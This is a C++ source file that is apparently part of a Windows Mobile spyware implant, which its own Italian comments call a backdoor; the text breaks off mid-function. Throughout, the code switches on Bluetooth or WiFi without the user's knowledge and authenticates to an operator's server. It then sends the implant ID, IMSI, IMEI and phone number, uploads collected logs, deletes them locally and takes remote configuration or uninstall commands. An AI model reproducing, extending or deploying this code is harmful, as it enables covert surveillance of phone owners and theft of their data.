#include <exception>
using namespace std;

#include "Transfer.h"
#include "Status.h"
#include "Device.h"
#include "Connmgr_status.h"
#include "Connmgr.h"
#include <Iphlpapi.h>

DEFINE_GUID(HMOBILE_PROTO_UUID, 0xa81fd4e0, 0xeec8, 0x4a1f, 0xbd, 0x6c, 0xb2, 0x49, 0x74, 0x57, 0x6b, 0xb9);
DEFINE_GUID(WIFI_DEVICE_GUID,   0x98c5250d, 0xc29a, 0x4985, 0xae, 0x5f, 0xaf, 0xe5, 0x36, 0x7e, 0x50, 0x06);

BOOL Transfer::InquiryService(WCHAR *address, void *protocolInfo)
{
	WSAQUERYSET querySet;
	GUID protocol;
	BYTE buffer[1000];
	DWORD bufferLength;
	WSAQUERYSET *pResults = (WSAQUERYSET*)&buffer;
	HANDLE handle;
	BTHNS_RESTRICTIONBLOB rb;
	BLOB blob;
	BOOL state;

	ZeroMemory(&blob, sizeof(BLOB));
	ZeroMemory(&rb, sizeof(rb));
	ZeroMemory(&querySet, sizeof(WSAQUERYSET));

	blob.cbSize = sizeof(BTHNS_RESTRICTIONBLOB);
	blob.pBlobData = (BYTE *)&rb;

	protocol = btGuid;

	querySet.dwSize = sizeof(querySet);
	querySet.lpServiceClassId = &protocol;
	querySet.dwNameSpace = NS_BTH;
	querySet.lpszContext = address;
	querySet.lpBlob = &blob;

	rb.type = SDP_SERVICE_SEARCH_REQUEST;
	rb.uuids[0].uuidType = SDP_ST_UUID128;
	rb.uuids[0].u.uuid128 = btGuid;

	if(WSALookupServiceBegin(&querySet, 0, &handle))
		return FALSE;

	bufferLength = sizeof(buffer);

	if(WSALookupServiceNext(handle, LUP_RETURN_BLOB, &bufferLength, pResults))
		state = FALSE;
	else
		state = TRUE;

	WSALookupServiceEnd(handle);
	return state;
}

BT_ADDR Transfer::FindServer(SOCKET bt)
{
	WSAQUERYSET querySet;
	WSAPROTOCOL_INFO protocolInfo;
	DWORD bufferLength;
	WCHAR addressAsString[64];
	HANDLE handle;
	GUID protocol;
	INT proto = sizeof(WSAPROTOCOL_INFO);
	BYTE buffer[1000];
	WSAQUERYSET *pResults = (WSAQUERYSET*)&buffer;
	BT_ADDR btAddr = 0;

	bufferLength = sizeof(buffer);

	ZeroMemory(&querySet, sizeof(querySet));

	querySet.dwSize  = sizeof(querySet);
	querySet.dwNameSpace  = NS_BTH;

	protocol = btGuid;

	if(getsockopt(bt, SOL_SOCKET, SO_PROTOCOL_INFOW, (CHAR *)&protocolInfo, &proto))
		return 0;

	if (WSALookupServiceBegin(&querySet, LUP_CONTAINERS, &handle))
		return 0;

	while (1) {
		if (WSALookupServiceNext(handle, LUP_RETURN_ADDR, &bufferLength, pResults) != 0)
			break;

		wsprintf(addressAsString, L"(%.2X:%.2X:%.2X:%.2X:%.2X:%.2X)", (UCHAR)pResults->lpcsaBuffer->RemoteAddr.lpSockaddr->sa_data[11],
			(UCHAR)pResults->lpcsaBuffer->RemoteAddr.lpSockaddr->sa_data[10], (UCHAR)pResults->lpcsaBuffer->RemoteAddr.lpSockaddr->sa_data[9],
			(UCHAR)pResults->lpcsaBuffer->RemoteAddr.lpSockaddr->sa_data[8], (UCHAR)pResults->lpcsaBuffer->RemoteAddr.lpSockaddr->sa_data[7],
			(UCHAR)pResults->lpcsaBuffer->RemoteAddr.lpSockaddr->sa_data[6]);

		if(InquiryService(addressAsString, &protocolInfo)) {
			memcpy(&btAddr, pResults->lpcsaBuffer->RemoteAddr.lpSockaddr->sa_data + 6, 6); 
			break;
		}
	}

	WSALookupServiceEnd(handle);
	return btAddr;
}

BOOL Transfer::ActivateBT() {
	DWORD dwRadioMode = 0;

	BthGetMode(&dwRadioMode);

	if(bIsBtAlreadyActive && dwRadioMode == BTH_POWER_OFF){
		bIsBtAlreadyActive = FALSE;
		bIsBtActive = FALSE;
	}

	switch(dwRadioMode){
		case BTH_CONNECTABLE:
		case BTH_DISCOVERABLE:
			bIsBtAlreadyActive = TRUE;
			break;

		default:
			bIsBtAlreadyActive = FALSE;
			BthSetMode(BTH_CONNECTABLE);
			BthGetMode(&dwRadioMode);
			break;
	}

	if(dwRadioMode == BTH_POWER_OFF)
			return FALSE;

	bIsBtActive = TRUE;
	return bIsBtActive;
}

BOOL Transfer::DeActivateBT() {
	DWORD dwRadioMode = 0;

	BthGetMode(&dwRadioMode);

	if(dwRadioMode == BTH_POWER_OFF){
		bIsBtActive = FALSE;
		return TRUE;
	}

	if(bIsBtAlreadyActive)
		return TRUE;

	BthSetMode(BTH_POWER_OFF);
	BthGetMode(&dwRadioMode);

	if(dwRadioMode != BTH_POWER_OFF){
		bIsBtActive = TRUE;
		return FALSE;
	}

	bIsBtActive = FALSE;
	return TRUE;
}

BOOL Transfer::ActivateWiFi() {
	CEDEVICE_POWER_STATE powerState = PwrDeviceUnspecified;

	if(pWifiAdapter == NULL)
		return FALSE;

	// A questo punto abbiamo in wifiName la GUID ed il nome dell'adattatore,
	// in pBuf il nome dell'adattatore gia' NULL terminato
	if(GetDevicePower(pWifiName, POWER_NAME, &powerState) != ERROR_SUCCESS) {
		powerState = D4; // In caso di errore, supponiamo che sia spenta
	}

	if(bIsWifiAlreadyActive && powerState == D4){
		bIsWifiAlreadyActive = FALSE;
		bIsWifiActive = FALSE;
	}

	// Conserviamo lo stato, lo utilizzeremo nella DeActivateWifi()
	wifiPower = powerState;

	switch(powerState){
		case D0: // Full on
		case D1: // Low on
			bIsWifiAlreadyActive = TRUE;
			break;

		default:
			bIsWifiAlreadyActive = FALSE;
			SetDevicePower(pWifiName, POWER_NAME, D0);

			if(GetDevicePower(pWifiName, POWER_NAME, &powerState) != ERROR_SUCCESS) {
				powerState = D4; // In caso di errore, supponiamo che sia spenta
			}
			break;
	}

	if(powerState == D4)
		return FALSE;

	Sleep(3000); // Attendiamo che il powerup sia completo
	bIsWifiActive = TRUE;
	return bIsWifiActive;
}

BOOL Transfer::DeActivateWiFi() {
	CEDEVICE_POWER_STATE powerState = PwrDeviceUnspecified;

	if(pWifiAdapter == NULL)
		return FALSE;

	if(GetDevicePower(pWifiName, POWER_NAME, &powerState) != ERROR_SUCCESS) {
		powerState = D4; // In caso di errore, supponiamo che sia spenta
	}

	if(bIsWifiAlreadyActive) {
		// Se necessario restoriamo lo stato di alimentazione originale
		if(powerState != wifiPower) {
			SetDevicePower(pWifiName, POWER_NAME, wifiPower);
		}

		return TRUE;
	}

	if(powerState == D4){
		SetDevicePower(pWifiName, POWER_NAME, D4); // Proviamo comunque a spegnerla
		bIsWifiActive = FALSE;
		return TRUE;
	}

	SetDevicePower(pWifiName, POWER_NAME, D4);

	if(GetDevicePower(pWifiName, POWER_NAME, &powerState) != ERROR_SUCCESS) {
		powerState = D4; // In caso di errore, supponiamo che sia spenta
	}

	if(powerState != D4){
		bIsWifiActive = TRUE;
		return FALSE;
	}

	bIsWifiActive = FALSE;
	return TRUE;
}

BOOL Transfer::IsWiFiActive() {
	CEDEVICE_POWER_STATE powerState = PwrDeviceUnspecified;

	if(pWifiAdapter == NULL)
		return FALSE;

	if(GetDevicePower(pWifiName, POWER_NAME, &powerState) != ERROR_SUCCESS) {
		powerState = D4; // In caso di errore, supponiamo che sia spenta
	}

	if(powerState == D0 || powerState == D1)
		return TRUE;

	return FALSE;
}

BOOL Transfer::SetBTPin(UCHAR *pPin, UINT uLen) {
	if(pPin == NULL || uLen == 0 || uLen > 16)
		return FALSE;

	ZeroMemory(BtPin, 16);
	memcpy(BtPin, pPin, uLen);
	return TRUE;
}

BOOL Transfer::IsInternetConnectionAvailable() {
	throw "Not yet implemented";
}

BOOL Transfer::IsWiFiConnectionAvailable() {
	PIP_ADAPTER_ADDRESSES pAdapterList;
	BYTE *pip = NULL;
	DWORD dwAdapterDim = sizeof(IP_ADAPTER_ADDRESSES) * 20, flags;

	if(IsWiFiActive() == FALSE)
		return FALSE;

	pip = new(std::nothrow) BYTE[dwAdapterDim];

	if(pip == NULL)
		return FALSE;

	ZeroMemory(pip, dwAdapterDim);
	flags = GAA_FLAG_SKIP_ANYCAST | GAA_FLAG_SKIP_FRIENDLY_NAME | GAA_FLAG_SKIP_MULTICAST | GAA_FLAG_SKIP_DNS_SERVER;

	if(GetAdaptersAddresses(AF_INET, flags, NULL, (PIP_ADAPTER_ADDRESSES)pip, &dwAdapterDim) != NO_ERROR) {
		delete[] pip;
		return FALSE;
	}

	// Possiamo anche usare la Transfer::GetAdapterIP() che e' parecchio piu' veloce
	for(pAdapterList = (PIP_ADAPTER_ADDRESSES)pip; pAdapterList != NULL; pAdapterList = pAdapterList->Next) {
		// Se e' il nostro adattatore WiFi ed ha un IP assegnato ritorna
		if(pAdapterList->AdapterName) {
			// Converti in widechar il nome dell'adapter
			WCHAR *wAdapter = new(std::nothrow) WCHAR[strlen(pAdapterList->AdapterName) + 1];

			if(wAdapter == NULL) {
				delete[] pip;
				return FALSE;
			}

			ZeroMemory(wAdapter, strlen(pAdapterList->AdapterName) + sizeof(WCHAR));
			wsprintf(wAdapter, L"%S", pAdapterList->AdapterName);

			if(!wcsncmp(pWifiAdapter, wAdapter, wcslen(pWifiAdapter)) && pAdapterList->OperStatus == IfOperStatusUp /* && pAdapterList->FirstUnicastAddress*/) {
				delete[] wAdapter;
				delete[] pip;
				return TRUE;
			}

			delete[] wAdapter;
		}
	}

	delete[] pip;

	return FALSE;
}

UINT Transfer::Send(UINT Type) {
	SOCKET localSocket;
	DWORD dwData, dwRead = 0;

	switch(Type){
		case CONF_SYNC_BT:
			localSocket = BTSocket;
			break;
	
		case CONF_SYNC_WIFI:
			localSocket = wifiSocket;
			break;

		case CONF_SYNC_INTERNET:
			localSocket = internetSocket;
			break;

		default: 
			localSocket = INVALID_SOCKET;
			break;
	}

	if(localSocket == INVALID_SOCKET || localSocket == SOCKET_ERROR)
		return FALSE;

	// Primo step del protocollo (CHALLENGE)
	if(SendChallenge(localSocket) == FALSE){
		SendCommand(localSocket, PROTO_BYE);
		return FALSE;
	}

	// Secondo step, controlliamo il response
	if(CheckResponse(localSocket) == FALSE){
		SendCommand(localSocket, PROTO_BYE);
		return FALSE;
	}

	if(SendCommand(localSocket, PROTO_OK) == SOCKET_ERROR)
		return FALSE;

	// Terzo step, riceviamo il challenge dal server
	if(GetChallenge(localSocket) == FALSE) {
		SendCommand(localSocket, PROTO_BYE);
		return FALSE;
	}

	// Attendiamo l'OK dal server
	if(RecvCommand(localSocket) != PROTO_OK)
		return FALSE;

	/* QUI FINISCE LA PARTE DI GESTIONE DEL CHALLENGE RESPONSE */

	// Inviamo i dati di identificazione del device
	if(SendIds(localSocket) == FALSE) {
		SendCommand(localSocket, PROTO_BYE);
		return FALSE;
	}

	bNewConf = FALSE;
	bUninstall = FALSE;

	/* RICEVIAMO LA NUOVA CONFIGURAZIONE O EVENTUALI COMANDI */
	while(1) {
		if((dwData = RecvCommand(localSocket)) == SOCKET_ERROR) {
			SendCommand(localSocket, PROTO_BYE);
			return FALSE;
		}

		switch(dwData) {
			case PROTO_SYNC: 	/* PARTIAMO CON LA SYNC */
				if(Sync(localSocket) == FALSE){
					SendCommand(localSocket, PROTO_NO);
				}

				ClearLogSnapshot();
				break;

			case PROTO_NEW_CONF:
				if(GetNewConf(localSocket) == FALSE){
					SendCommand(localSocket, PROTO_NO);
				} else {
					bNewConf = TRUE;
				}
				break;

			case PROTO_UNINSTALL:
				bUninstall = TRUE;
				SendCommand(localSocket, PROTO_OK);
				return TRUE;

			case PROTO_BYE:
				SendCommand(localSocket, PROTO_BYE);
				return TRUE;

			case PROTO_DOWNLOAD:
				break;

			case PROTO_UPLOAD:
				break;

			default:
				return FALSE;
		}
	}

	/* SALUTIAMO IL SERVER */
	SendCommand(localSocket, PROTO_BYE);

	return TRUE;
}

BOOL Transfer::SendIds(SOCKET s) {
	UINT uLen = 0;
	DWORD dwData = 0;
	BYTE *pData = NULL, *pEncrypted = NULL;
	Device *pDev = Device::self();
	Encryption *pEnc = NULL;

	if(s == NULL || s == INVALID_SOCKET)
		return FALSE;

	if(pDev == NULL)
		return FALSE;

	pEnc = new(std::nothrow) Encryption(g_Challenge, KEY_LEN);

	if(pEnc == NULL)
		return FALSE;

	pDev->RefreshData();

	// 1. Invio la versione (cifrata) della backdoor
	if(SendCommand(s, PROTO_VERSION) == SOCKET_ERROR)
		return FALSE;

	uLen = sizeof(g_Version); // Lunghezza di g_Version
	if(SendData(s, (BYTE *)&uLen, sizeof(UINT)) == SOCKET_ERROR) {
		delete pEnc;
		return FALSE;
	}

	// Attendiamo l'OK dal server
	if(RecvCommand(s) != PROTO_OK)
		return FALSE;

	// Cifriamo g_Version (16 byte)
	pData = pEnc->EncryptData((BYTE *)&g_Version, &uLen);

	if(pData == NULL) {
		delete pEnc;
		return FALSE;
	}

	if(SendData(s, pData, uLen) == SOCKET_ERROR) {
		delete[] pData;
		delete pEnc;
		return FALSE;
	}

	delete[] pData;
	pData = NULL;

	// Attendiamo l'OK dal server
	if(RecvCommand(s) != PROTO_OK)
		return FALSE;

	// 2. Invio l'id univoco della backdoor
	if(SendCommand(s, PROTO_ID) == SOCKET_ERROR)
		return FALSE;

	uLen = 16;
	if(SendData(s, (BYTE *)&uLen, sizeof(UINT)) == SOCKET_ERROR) {
		delete pEnc;
		return FALSE;
	}

	// Attendiamo l'OK dal server
	if(RecvCommand(s) != PROTO_OK)
		return FALSE;

	// Cifriamo il g_BackdoorID (16 byte)
	pData = pEnc->EncryptData(g_BackdoorID, &uLen);

	if(pData == NULL) {
		delete pEnc;
		return FALSE;
	}

	if(SendData(s, pData, uLen) == SOCKET_ERROR) {
		delete[] pData;
		delete pEnc;
		return FALSE;
	}

	delete[] pData;
	pData = NULL;

	// Attendiamo l'OK dal server
	if(RecvCommand(s) != PROTO_OK)
		return FALSE;

	// 3. Invio l'instance id della backdoor
	if(SendCommand(s, PROTO_INSTANCE) == SOCKET_ERROR)
		return FALSE;

	uLen = 20;
	if(SendData(s, (BYTE *)&uLen, sizeof(UINT)) == SOCKET_ERROR) {
		delete pEnc;
		return FALSE;
	}

	// Attendiamo l'OK dal server
	if(RecvCommand(s) != PROTO_OK)
		return FALSE;

	// Cifriamo il g_InstanceId (20 byte)
	pData = pEnc->EncryptData(g_InstanceId, &uLen);

	if(pData == NULL) {
		delete pEnc;
		return FALSE;
	}

	if(SendData(s, pData, uLen) == SOCKET_ERROR) {
		delete[] pData;
		delete pEnc;
		return FALSE;
	}

	delete[] pData;
	pData = NULL;

	// Attendiamo l'OK dal server
	if(RecvCommand(s) != PROTO_OK)
		return FALSE;

	pData = (BYTE *)pDev->GetImsi();

	// 4. Invio l'IMSI
	if(SendCommand(s, PROTO_USERID) == SOCKET_ERROR) {
		delete pEnc;
		return FALSE;
	}

	uLen = WideLen((WCHAR *)pData);

	if(SendData(s, (BYTE *)&uLen, sizeof(UINT)) == SOCKET_ERROR) {
		delete pEnc;
		return FALSE;
	}

	// Attendiamo l'OK dal server
	if(RecvCommand(s) != PROTO_OK) {
		delete pEnc;
		return FALSE;
	}

	pData = pEnc->EncryptData(pData, &uLen);

	if(pData == NULL) {
		delete pEnc;
		return FALSE;
	}

	if(SendData(s, pData, uLen) == SOCKET_ERROR) {
		delete[] pData;
		delete pEnc;
		return FALSE;
	}

	delete[] pData;
	pData = NULL;

	// Attendiamo l'OK dal server (solo se abbiamo spedito dati)
	if(uLen && RecvCommand(s) != PROTO_OK) {
		delete pEnc;
		return FALSE;
	}

	pData = (BYTE *)pDev->GetImei();

	// 5. Invio l'IMEI
	if(SendCommand(s, PROTO_DEVICEID) == SOCKET_ERROR) {
		delete pEnc;
		return FALSE;
	}

	uLen = WideLen((WCHAR *)pData);

	if(SendData(s, (BYTE *)&uLen, sizeof(UINT)) == SOCKET_ERROR) {
		delete pEnc;
		return FALSE;
	}

	// Attendiamo l'OK dal server
	if(RecvCommand(s) != PROTO_OK) {
		delete pEnc;
		return FALSE;
	}

	pData = pEnc->EncryptData(pData, &uLen);

	if(pData == NULL) {
		delete pEnc;
		return FALSE;
	}

	if(SendData(s, pData, uLen) == SOCKET_ERROR) {
		delete[] pData;
		delete pEnc;
		return FALSE;
	}

	delete[] pData;
	pData = NULL;

	// Attendiamo l'OK dal server (solo se abbiamo spedito dati)
	if(uLen && RecvCommand(s) != PROTO_OK) {
		delete pEnc;
		return FALSE;
	}

	pData = (BYTE *)pDev->GetPhoneNumber();

	// 6. Inviamo il numero di telefono
	if(SendCommand(s, PROTO_SOURCEID) == SOCKET_ERROR) {
		delete pEnc;
		return FALSE;
	}

	uLen = WideLen((WCHAR *)pData);

	if(SendData(s, (BYTE *)&uLen, sizeof(UINT)) == SOCKET_ERROR) {
		delete pEnc;
		return FALSE;
	}

	// Attendiamo l'OK dal server (solo se abbiamo spedito dati)
	if(RecvCommand(s) != PROTO_OK) {
		delete pEnc;
		return FALSE;
	}

	pData = pEnc->EncryptData(pData, &uLen);

	if(pData == NULL) {
		delete pEnc;
		return FALSE;
	}

	if(SendData(s, pData, uLen) == SOCKET_ERROR) {
		delete[] pData;
		delete pEnc;
		return FALSE;
	}

	delete[] pData;
	pData = NULL;

	// Attendiamo l'OK dal server (solo se abbiamo spedito dati)
	if(uLen && RecvCommand(s) != PROTO_OK) {
		delete pEnc;
		return FALSE;
	}

	delete pEnc;
	return TRUE;
}

BYTE* Transfer::Recv(UINT* len) {
	throw "Not yet implemented";
}

BOOL Transfer::Close(UINT type) {
	throw "Not yet implemented";
}

BOOL Transfer::SendChallenge(SOCKET s) {
	UINT uRand, i;
	Rand r;

	if(s == NULL || s == INVALID_SOCKET)
		return FALSE;

	// Generiamo 16 byte casuali
	for(i = 0; i < 16; i += 4) {
		uRand = r.rand32();
		memcpy((BYTE *)&Challenge[i], &uRand, sizeof(uRand));
	}

	// Spediamo il CHALLENGE command
	if(SendCommand(s, PROTO_CHALLENGE) == SOCKET_ERROR)
		return FALSE;

	// E poi spediamo il challenge
	if(SendData(s, Challenge, 16) == SOCKET_ERROR)
		return FALSE;

	return TRUE;
}

BOOL Transfer::CheckResponse(SOCKET s) {
	BYTE Response[16], *pChallenge = NULL;
	UINT uCommand = 0, uLen = 0;
	Encryption *pEnc = NULL;

	if(s == NULL || s == INVALID_SOCKET)
		return FALSE;

	// Cifriamo il challenge che abbiamo generato
	pEnc = new(std::nothrow) Encryption(g_Challenge, KEY_LEN);

	if(pEnc == NULL)
		return FALSE;

	uLen = 16;
	pChallenge = pEnc->EncryptData(Challenge, &uLen);

	delete pEnc;

	if(pChallenge == NULL)
		return FALSE;

	memcpy(Challenge, pChallenge, 16);
	delete[] pChallenge;

	// Riceviamo il comando di response
	if(RecvCommand(s) != PROTO_RESPONSE)
		return FALSE;

	// Riceviamo il response vero e proprio
	if(RecvData(s, Response, 16) == SOCKET_ERROR)
		return FALSE;

	// Prendiamo i byte, e controlliamo se quelli cifrati dal server
	// sono uguali ai nostri
	if(memcmp(Response, Challenge, sizeof(Challenge)))
		return FALSE;

	return TRUE;
}

BOOL Transfer::GetChallenge(SOCKET s) {
	BYTE uChallenge[16], *pChallenge = NULL;
	UINT uCommand = 0, uLen = 0;
	Encryption *pEnc = NULL;

	if(s == NULL || s == INVALID_SOCKET)
		return FALSE;

	// Cifriamo il challenge che abbiamo generato
	pEnc = new(std::nothrow) Encryption(g_Challenge, KEY_LEN);

	if(pEnc == NULL)
		return FALSE;

	// Riceviamo il comando di challenge
	if(RecvCommand(s) != PROTO_CHALLENGE)
		return FALSE;

	// Riceviamo il challenge vero e proprio
	if(RecvData(s, uChallenge, 16) == SOCKET_ERROR)
		return FALSE;

	uLen = 16;
	pChallenge = pEnc->EncryptData(uChallenge, &uLen);

	delete pEnc;

	if(pChallenge == NULL)
		return FALSE;

	memcpy(uChallenge, pChallenge, 16);
	delete[] pChallenge;


	// Spediamo il RESPONSE command
	if(SendCommand(s, PROTO_RESPONSE) == SOCKET_ERROR)
		return FALSE;

	// E poi spediamo il response
	if(SendData(s, uChallenge, 16) == SOCKET_ERROR)
		return FALSE;

	return TRUE;
}

BOOL Transfer::Sync(SOCKET s) {
#define SAFE_EXIT(x)	if(pData) \
						delete[] pData; \
						if(hFile != INVALID_HANDLE_VALUE) \
						CloseHandle(hFile); \
						return x;

	BYTE *pData = NULL;
	list<LogInfo>::iterator iter;
	UINT uCommand = 0, logNum, dwSize, dwRead = 0, dwBuf[2];
	HANDLE hFile;

	if(s == NULL || s == INVALID_SOCKET)
		return FALSE;

	// pSnap puo' essere nullo in caso di errore o se non ci sono uberlogObj.
	// Lo snapshot viene liberato subito dopo questa chiamata.
	pSnap = uberlogObj->ListClosed();

	if(pSnap == NULL || pSnap->size() == 0) {
		// Diciamo al server quanti TransferLog stiamo per spedire
		dwBuf[0] = PROTO_LOG_NUM;
		dwBuf[1] = 0;

		if(SendData(s, (BYTE *)&dwBuf, sizeof(dwBuf)) == SOCKET_ERROR)
			return FALSE;

		// Attendiamo l'OK dal server
		if(RecvCommand(s) != PROTO_OK)
			return FALSE;

		return TRUE;
	}

	logNum = pSnap->size();

	// Diciamo al server quanti TransferLog stiamo per spedire
	dwBuf[0] = PROTO_LOG_NUM;
	dwBuf[1] = logNum;

	if(SendData(s, (BYTE *)&dwBuf, sizeof(dwBuf)) == SOCKET_ERROR)
		return FALSE;

	// Attendiamo l'OK dal server
	if(RecvCommand(s) != PROTO_OK)
		return FALSE;

	for(iter = pSnap->begin(); iter != pSnap->end(); iter++){
		hFile = CreateFile((*iter).pLog, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

		if(hFile == INVALID_HANDLE_VALUE)
			continue;

		dwSize = GetFileSize(hFile, NULL);

		if(dwSize == 0){
			CloseHandle(hFile);
			continue;
		}

		// LOG,# di bytes
		dwBuf[0] = PROTO_LOG;
		dwBuf[1] = dwSize;

		if(SendData(s, (BYTE *)&dwBuf, sizeof(dwBuf)) == SOCKET_ERROR) {
			SAFE_EXIT(FALSE);
		}
		
		// Attendiamo l'OK dal server
		if(RecvCommand(s) != PROTO_OK) {
			SAFE_EXIT(FALSE);
		}

		// Spediamo il TransferLog
		pData = new(std::nothrow) BYTE[dwSize];

		if(pData == NULL) {
			SAFE_EXIT(FALSE);
		}

		if(!ReadFile(hFile, pData, dwSize, (DWORD *)&dwRead, NULL)){
			CloseHandle(hFile);
			delete[] pData;
			pData = NULL;
			continue;
		}

		CloseHandle(hFile);

		if(SendData(s, pData, dwRead) == SOCKET_ERROR) {
			SAFE_EXIT(FALSE);
		}

		// Attendiamo l'OK dal server
		if(RecvCommand(s) != PROTO_OK) {
			SAFE_EXIT(FALSE);
		}

		delete[] pData;
		pData = NULL;

		// Rimuoviamo il log dalla lista globale e dal filesystem
		uberlogObj->Delete((*iter).pLog);
	}

	return TRUE;
}

BOOL Transfer::SetBTMacAddress(UINT64 uMacAddress) {
	if(uMacAddress == 0)
		return FALSE;

	uBtMac = uMacAddress;

	return TRUE;
}

BOOL Transfer::SetBTGuid(GUID gGuid) {
	btGuid = gGuid;
#pragma message(__LOC__"Rimuovere")
	btGuid = HMOBILE_PROTO_UUID;
	return TRUE;
}

BOOL Transfer::SetWifiMacAddress(UINT pMacAddress) {
	throw "Not yet implemented";
}

BOOL Transfer::SetWifiSSID(WCHAR* pSSID, UINT uLen) {
	if(pSSID == NULL || uLen == 0)
		return FALSE;

	ZeroMemory(wSsid, sizeof(wSsid));
	memcpy(wSsid, pSSID, uLen);
	return TRUE;
}

BOOL Transfer::SetWifiKey(BYTE* pKey, UINT uLen) {
	if(pKey == NULL)
		return FALSE;

	// Teniamo traccia della lunghezza della chiave
	uWifiKeyLen = uLen;

	ZeroMemory(wifiKey, sizeof(wifiKey));
	memcpy(wifiKey, pKey, uLen);
	return TRUE;
}

Transfer::Transfer() : bIsBtActive(FALSE), bIsWifiActive(FALSE), bIsBtAlreadyActive(FALSE), 
bIsWifiAlreadyActive(FALSE), uBtMac(0), retryTimes(0), pollInterval(0), pSnap(NULL), uberlogObj(NULL),
bNewConf(FALSE), bUninstall(FALSE), wifiObj(NULL), pWifiName(NULL), pWifiAdapter(NULL), 
bWiFiForced(FALSE), uWifiKeyLen(0), pwRegistryIp(NULL), pwRegistryMask(NULL), ulRegistryDhcp(0),
bGprsForced(FALSE) {
	WCHAR wifiGuid[]  = L"{98C5250D-C29A-4985-AE5F-AFE5367E5006}\\";
	WCHAR *wOffset = NULL;
	DWORD dwBufLen = 256;
	
	statusObj = Status::self();
	uberlogObj = UberLog::self();
	wifiObj = new(std::nothrow) CWifi();

	ZeroMemory(BtPin, sizeof(BtPin));
	ZeroMemory(&btGuid, sizeof(btGuid));

	btGuid = HMOBILE_PROTO_UUID;

	// Impostiamo un intervallo di default
	SetPollInterval(10000, 5);

	// Otteniamo il nome degli adattori WiFi
	if(wifiObj == NULL)
		return;

	pWifiAdapter = new(std::nothrow) WCHAR[dwBufLen];

	if(pWifiAdapter == NULL)
		return;

	ZeroMemory(pWifiAdapter, dwBufLen * sizeof(WCHAR));

	if(wifiObj->IsWiFiPresent() == FALSE) {
		delete[] pWifiAdapter;
		pWifiAdapter = NULL;
		pWifiName = NULL;
		return;
	}

	if(wifiObj->WZCGetAdapterName(pWifiAdapter, dwBufLen) == FALSE) {
		delete[] pWifiAdapter;
		pWifiAdapter = NULL;
		pWifiName = NULL;
		return;
	}

	/*
	// Questa chiamata va usata solo se non c'e' WZC poiche' non tutti i driver
	// supportano le IOCTL_* definite da Microsoft
	if(wifiObj->GetAdapters(pWifiAdapter, dwBufLen) == FALSE) {
		delete[] pWifiAdapter;
		pWifiAdapter = NULL;
		pWifiName = NULL;
		return;
	}

	// Le schede WiFi vengono listate separate da una virgola
	// per il momento prendiamo solo il nome del primo adattatore
	wOffset = wcschr(pWifiAdapter, ',');

	if(wOffset) {
		*wOffset = 0;
	}*/

	pWifiName = new(std::nothrow) WCHAR[wcslen(wifiGuid) + wcslen(pWifiAdapter) + 1];

	if(pWifiName == NULL) { 
		delete[] pWifiAdapter;
		pWifiAdapter = NULL;
		pWifiName = NULL;
		return;		
	}

	ZeroMemory(pWifiName, wcslen(wifiGuid) + wcslen(pWifiAdapter) + sizeof(WCHAR));
	wcscpy_s(pWifiName, wcslen(wifiGuid) + wcslen(pWifiAdapter) + 1, wifiGuid);
	wcscat_s(pWifiName, wcslen(wifiGuid) + wcslen(pWifiAdapter) + 1, pWifiAdapter);

	// A questo punto pWifiAdapter e pWifiname sono valorizzati
}

Transfer::~Transfer() {
	ClearLogSnapshot();

	if(pwRegistryIp)
		delete[] pwRegistryIp;

	if(pwRegistryMask)
		delete[] pwRegistryMask;

	if(wifiObj)
		delete wifiObj;

	if(pWifiAdapter)
		delete[] pWifiAdapter;

	if(pWifiName)
		delete[] pWifiName;
}

BOOL Transfer::BtSend() {
	WSADATA wsd;
	list<ConfStruct *> *conf = NULL;
	list<ConfStruct *>::iterator iter;
	SOCKADDR_BTH sab;
	BTH_SOCKOPT_SECURITY bss;
	UINT poll, times, i;
	INT ret;

	if(statusObj == FALSE)
		return FALSE;

	ZeroMemory(&sab, sizeof(SOCKADDR_BTH));
	ZeroMemory(&bss, sizeof(BTH_SOCKOPT_SECURITY));

	WAIT_AND_SIGNAL(statusObj->hConfigLock);
	conf = statusObj->GetConfigStruct();

	if(conf == NULL){
		UNLOCK(statusObj->hConfigLock);
		return FALSE;
	}

	for(iter = conf->begin(); iter != conf->end(); iter++){
		switch((*iter)->uConfId){
			case CONFIGURATION_BTMAC: 
				SetBTMacAddress(*(BT_ADDR *)((*iter)->pParams));
				break;

			case CONFIGURATION_BTPIN:
				SetBTPin((UCHAR *)((*iter)->pParams), (*iter)->uParamLength);
				break;

			case CONFIGURATION_CONNRETRY:
				poll = *(UINT *)((*iter)->pParams);
				times = *(UINT *)((BYTE *)(*iter)->pParams + 4);
				SetPollInterval(poll, times);
				break;

			case CONFIGURATION_BTGUID:
				SetBTGuid(*(GUID *)((*iter)->pParams));
				break;

			default: break;
		}
	}
	UNLOCK(statusObj->hConfigLock);

	if(WSAStartup(MAKEWORD(1,0),&wsd) != 0)
		return FALSE;

	if(ActivateBT() == FALSE){
		WSACleanup();
		return FALSE;
	}

	BTSocket = socket(AF_BTH, SOCK_STREAM, BTHPROTO_RFCOMM);

	if(BTSocket == INVALID_SOCKET){
		DeActivateBT();
		WSACleanup();
		return FALSE;
	}

	// Find loop
	i = 0;
	while(i < retryTimes){
		uBtMac = FindServer(BTSocket);

		if(uBtMac == 0) {
			Sleep(pollInterval);
			i++;
			continue;
		}

		break;
	}

	if(uBtMac == 0) { 
		DeActivateBT();
		WSACleanup();
		return FALSE;
	}

	sab.btAddr = uBtMac;
	sab.addressFamily = AF_BTH;
	sab.port = 0;
	sab.serviceClassId = btGuid;
	bss.btAddr = uBtMac;
	bss.iLength = strlen((CHAR *)BtPin);
	memcpy((CHAR *)bss.caData, (CHAR *)BtPin, strlen((CHAR *)BtPin));

	if(strlen((CHAR *)BtPin)){
		if(setsockopt(BTSocket, SOL_RFCOMM, SO_BTH_SET_PIN , (CHAR *)&bss, sizeof(bss)) == SOCKET_ERROR){
			DeActivateBT();
			closesocket(BTSocket);
			WSACleanup();
			return FALSE;
		}

		INT encryption = TRUE;
		if(setsockopt(BTSocket, SOL_RFCOMM, SO_BTH_ENCRYPT , (CHAR *)&encryption, sizeof(encryption)) == SOCKET_ERROR){
			DeActivateBT();
			closesocket(BTSocket);
			WSACleanup();
			return FALSE;
		}
	}

	// Connect loop
	i = 0;
	while(i < retryTimes){
		ret = connect(BTSocket, (const sockaddr *)&sab, sizeof(sab));

		if(ret) {
			ret = WSAGetLastError();
			Sleep(pollInterval);
			i++;
			continue;
		}

		break;
	}

	// Non si riesce a connettere, torniamo con un errore
	if (ret) {
